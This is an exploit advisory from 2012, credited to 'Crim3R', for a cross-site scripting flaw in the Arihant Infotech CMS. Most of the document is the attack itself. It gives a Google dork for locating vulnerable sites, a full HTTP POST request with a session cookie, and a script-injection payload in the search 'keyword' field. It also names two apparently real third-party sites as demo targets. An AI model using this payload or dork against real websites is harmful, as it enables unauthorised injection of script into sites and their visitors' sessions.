Arihant Infotech CMS suffers from a cross site scripting vulnerability.
e943e1e25984a03df8bf7e03c6a9dd90872d10256c23e6fbcd489ae15cdc9ee6
#######################################################
# #
# ________ .__ __________________ #
# \_ ___ \_______|__| _____ \_____ \______ \ #
# / \ \/\_ __ \ |/ \ _(__ <| _/ #
# \ \____| | \/ | Y Y \/ \ | \ #
# \______ /|__| |__|__|_| /______ /____|_ / #
# \/ \/ \/ \/ #
# #
#######################################################
#
#
# Exploit Title: Arihant Infotech Cms Cross Site Scripting Vulnerability
#
# Google Dork: Intext:"Powered BY Arihant Infotech"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.aiindia.com/
#
# Tested on: all
#
==================================
HTTP Headers / Host: site.sunrisepolymers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://site.sunrisepolymers.com/index.php
Cookie: PHPSESSID=dbe6ce49c5a8348a1cb44e6f0d4beef7
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Post Data --------------
keyword="><script>alert(0);</script>&Submit=
D3m0:
http://site.sunrisepolymers.com/search_result.php
http://website.deepakfoundation.org/search_result.php
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A